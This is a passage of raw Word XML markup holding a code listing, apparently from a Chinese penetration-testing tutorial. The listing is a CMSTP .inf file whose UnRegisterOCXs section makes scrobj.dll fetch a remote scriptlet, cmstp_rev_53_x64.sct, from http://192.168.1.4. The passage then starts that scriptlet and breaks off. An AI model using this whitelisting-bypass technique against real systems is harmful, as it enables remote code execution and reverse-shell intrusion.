      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="90"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>DefaultInstall_SingleUser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="5631" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>UnRegisterOCXs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>UnRegisterOCXSection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="13" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="90"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>UnRegisterOCXSection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="2870" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\scrobj</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>NI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>192.168</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cmstp_rev_53_x64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="43" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="91"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Strings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AppAct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"SOFTWARE\Microsoft\Connection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Manager"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="91"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ServiceName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"Micropoor"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="91"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ShortSvcName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"Micropoor"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="330" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="22"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cms</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tp_rev_53_x64.sct</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="371" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"1.0"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
